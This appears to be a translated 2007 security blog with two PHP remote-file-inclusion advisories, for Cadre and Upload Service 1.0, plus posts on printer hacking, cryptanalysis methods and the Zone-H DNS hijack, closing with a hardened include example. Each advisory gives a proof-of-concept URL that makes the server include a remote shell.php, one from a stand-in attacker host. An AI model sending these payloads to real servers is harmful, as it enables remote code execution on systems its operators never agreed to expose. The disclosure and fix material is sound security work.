Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : January, 31st 2007
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv63-y3dips-2007.txt
Critical Lvl : Critical
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Cadre
URL : http://www.cronosys.com | http://savannah.gnu.org/projects/cadre/
Download-path : http://ftp.azc.uam.mx/mirrors/gnu/savannah/files/cadre/cadre-20020724.tar.gz
Description : Cadre is a PHP framework for developing large business applications.
It currently supports PostgreSQL as the database back end (although
this is extensible).
Vulnerability:
~~~~~~~~~~~~~~
-----class.Quick_Config_Browser.php ----
include_once($GLOBALS[config][framework_path] . "class.Browser.php");
-------
An attacker can exploit this vulnerability with a simple PHP injection script.
Poc/Exploit:
~~~~~~~~~~~~
http://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/shell.php?
Greetz:
~~~~~~~
ana, K-159, the_day, str0ke, waraxe, negative
Wednesday, January 31, 2007
Sunday, January 28, 2007
Printers are a target?
Yeah .. as written by Larry Seltzer in the piece titled "Our Printer Got Hacked?!?!" in the security column on eweek.com, dated January 25, 2007; he goes on to opine that a hacker can "enter" an open port and perform a BOF (buffer overflow) exploit against the printer.
After reading a bit of that piece, I was reminded of a book I once read; I remember that one of its chapters describes in detail the process of hacking a printer, and what's "cool" is that the book was published in 2003 (underground technique, huh?? yippee). Here is a short "excerpt" from that chapter:
h3X is a hacker, or to be more precise, she is a hackse (from hexe, the German word for witch). Currently, h3X is on the lookout for some printers. Printers are the best places to hide files and share them with other folks anonymously. And since not too many people know about that, h3X likes to store exploit codes and other kinky stuff on printers, and point her buddies to the Web servers that actually run on these printers.
Chapter 4, h3X's Adventures in Networkland by FX; Stealing the Network: How to Own the Box
Actually, I myself have never done any "PoC" related to this at all, but given the architecture of a printer, which is equipped with memory and runs services (binding ports like a PC), it is possible to turn it into a file server, exploit it, or even just do "anonymous printing". Oh yeah, a small question from me: after a failure in the printing process, if you restart the computer and the printer, once everything has powered up fully, will the printer immediately print the "pending/failed process"?
The on-board memory consists of six areas: base code, language code, fonts, DRAM, EEROM (electrically erasable read-only memory), and expandable. The base code is split between two 500K-byte devices and uses one of the minor support ASICs to interface with the data bus. Its two functions are to help ease bus loading and to provide a small pipeline. The language code uses a single 2M-byte read-only-memory (ROM) which contains the PCL 5C language and several internal demonstration plots. The fonts are also contained in a single 2M-byte ROM. The main DRAM is used for swath and processor scratch memory. The PCL 5C ROM, the font ROM, and the DRAM have direct access to the address and data bus. The EEROM stores constants that must be retained when the unit is powered off. Finally, the expandable space can be used for up to 24M bytes of DRAM, or up to 18M bytes with the PostScript option.
HP DeskJet 1200C Printer Architecture; www.hpl.hp.com/hpjournal/94feb/feb94a8.pdf
Dare to try it?
Saturday, January 27, 2007
Cryptanalysis
Cryptanalysis is the study of methods for obtaining the meaning of encrypted information, without access to the secret information which is normally required to do so. Typically, this involves finding the secret key. In non-technical language, this is the practice of codebreaking or cracking the code.
Methods of cryptanalysis
Classical cryptanalysis:
Frequency analysis
Kasiski examination
Index of coincidence
Symmetric algorithms:
Differential cryptanalysis
Linear cryptanalysis
Integral cryptanalysis
Related-key attack
Statistical cryptanalysis
Mod-n cryptanalysis
XSL attack
Slide attack
Boomerang attack
Davies' attack
Yoyo game
Other methods:
Birthday attack
Man in the middle attack
Brute force attack
Gardening (cryptanalysis)
Differential power analysis
I got the information above from http://en.wikipedia.org/wiki/Cryptanalysis;
frankly, this startled me a bit too, because information like that can be obtained so easily on the internet (kids, leave your school and just !google all your questions :lol:, kidding), but unfortunately there are still many who "don't get it" and regard it as
I don't know what "possessed" me such that for me "breaking in" is more fun than "securing", and this is what made me "switch lanes" (if I may say that, or you may say that), along with some views I "didn't quite agree with" back then (read: bad memories from the past; remember! the wrong medicine will poison you instead), because for me nothing is 100% secure, and security is not just a matter of "how long the key" is, "how good the algorithm" is, or "how many layers of firewall" are used.
Actually this post is just to answer anyone who asks me about this (if anyone does (actually someone already has :P, although honestly I'm still not being transparent here .. hehehehhe). Oh yeah .. want to know why I suddenly wrote this? It's because I got tickled again after someone asked on the echo forum how to test the strength of cryptography (which actually strayed from the question but did bring back a few "memories").
Once again, like the message in my footer: "Oh well, whatever, nevermind".
Tuesday, January 23, 2007
Zone-H got defaced
Defacement archive Zone-H has itself been defaced.
I got this info posted on the echo official mailing list, sent by Charlie Crespo (our old friend from Singapore, also a member of SIG^2; hi, Cecil). The defacement is still up as I write this post (January 23rd 2007, 21:10 WIB); in December 2006 Zone-H also got defaced.
As far as I know they are running the Apache web server on the Linux operating system and using a "customized" Joomla content management system.
Updated (January 24th 2007)
Confirmation from R. Preatoni about the zone-h.org defacement on the Zone-H official page:
Have you recently seen a different Zone-H when trying to access our pages? Magic of DNS redirection.
It appears that Saudi Arabia crackers managed to get the passwords of our registrar (our registrant panel to be precise), accessed the domain management page and changed the DNS entries, pointing the zone-h domain to an IP address belonging to the crackers on which they mounted the page you saw in the last 48 hours.
48 hours!?! So long it took to take contact with the registrar (they work only through email communication), explain the problem to 8 different people then finally getting a reset of our credentials, taking the domain back in control.
On the funny side, the same problem happened to Google in its German version which yesterday evening was redirected to a different page (different owner actually). In this case (automatic German/English translation) the trick was a bogus domain transfer request that a German provider accepted without explicit authorization from Google Inc. (silence-consense).
What a day! We are so glad we deserve so much of attention.
PS: you will soon find the mirrors in our DB as even though Zone-H wasn't hacked, from the users' point of view it appeared defaced, as only a few users realized they weren't visiting the actual Zone-H server. From the historical point of view exactly the same incident happened to the Al Jazeera sat tv network website, where a hacker managed to trick the registrar to send him the domain control passwords after sending a bogus passport copy during the ID verification process, subsequently changing Al Jazeera's DNS pointing to a different server.
p.s: that's why I saw a "funny" thing on the "defacement page" yesterday: the icon linking to zone-h.it
<link rel="shortcut icon" href="http://www.zone-h.it/images/favicon.ico">
Well .. well, as an attacker you just need to find the weakest link, isn't it?
Monday, January 22, 2007
[ECHO_ADV_62$2007] Upload Service 1.0 remote file inclusion
Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : January, 21st 2007
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv62-y3dips-2007.txt
Critical Lvl : Critical
------------------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Upload Service
version : 1.0
URL : http://bild-bearbeiten.de/
Download-path : http://bild-bearbeiten.de/scripts/upload_service_1.0.zip
---------------------------------------------------------------------------
1. The install directory is not removed after the installation process.
2. The variable "$maindir" in top.php is not properly sanitized.
---------------top.php--------------------------------
...
include($maindir."config.php");
include($maindir."functions/error.php");
...
------------------------------------------------------------------
When register_globals=on and allow_url_fopen=on, an attacker can exploit
this vulnerability with a simple PHP injection script.
Poc/Exploit:
~~~~~~~~~~
http://127.0.0.1/upload/top.php?maindir=http://127.0.0.1/shell.php?
Solution:
~~~~~~~
- Remember to remove your install directory and change the permissions of config.php
- Sanitize the variable $maindir in the affected files (e.g. initialize it explicitly: $maindir=" "; before any include, so a request value cannot seed it)
- Turn off register_globals
Notification:
~~~~~~~~~~
Vendor not contacted yet
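Both advisories on this page (Cadre above and Upload Service here) describe the same pattern: an include path that can be seeded from the request under register_globals, which turns into remote code execution when URL includes are allowed. The hardened replacement below is an added example, not code from the advisories or from either project; the safe_include() helper and its file allow-list are assumptions.

```php
<?php
// Added example (not from the advisory or from the Upload Service / Cadre code).
// Hardened form of the include pattern shown in the advisories:
//   include($maindir."config.php");                                    (top.php)
//   include_once($GLOBALS[config][framework_path] . "class.Browser.php");
// With register_globals=on the path variable can be set from the query string,
// and with allow_url_fopen / allow_url_include on that path may be a remote URL,
// so the attacker's PHP is fetched and executed. Two fixes are applied here:
// the base directory is pinned to the application, and every include goes
// through one function that allow-lists the file and refuses anything that
// does not resolve inside that directory.
//
// php.ini settings that remove the preconditions (the directives are real):
//   register_globals = Off
//   allow_url_include = Off   ; PHP >= 5.2; blocks http://, ftp:// in include
//   allow_url_fopen = Off     ; unless remote fopen() is actually needed

declare(strict_types=1);

// 1. Never take an include base from request data: pin it to this file's directory.
$maindir = __DIR__ . DIRECTORY_SEPARATOR;

// 2. Resolve every include through an allow-list plus a realpath() prefix check.
function safe_include(string $base, string $relative): void
{
    // Hypothetical allow-list: the only files this page is permitted to load.
    static $allowed = ['config.php', 'functions/error.php', 'class.Browser.php'];
    if (!in_array($relative, $allowed, true)) {
        throw new RuntimeException("include not permitted: $relative");
    }

    // realpath() returns false for URLs, stream wrappers (php://, data:) and
    // missing files; the prefix comparison defeats ../ traversal out of $base.
    $baseReal = realpath($base);
    $target   = realpath($base . $relative);
    $prefix   = $baseReal === false ? '' : $baseReal . DIRECTORY_SEPARATOR;
    if ($baseReal === false || $target === false
        || strncmp($target, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException("include outside application directory: $relative");
    }
    include_once $target;
}

// A request such as ?maindir=http://example.invalid/x.php? no longer has any
// effect: $maindir is assigned above and never read from the request.
safe_include($maindir, 'config.php');
safe_include($maindir, 'functions/error.php');
```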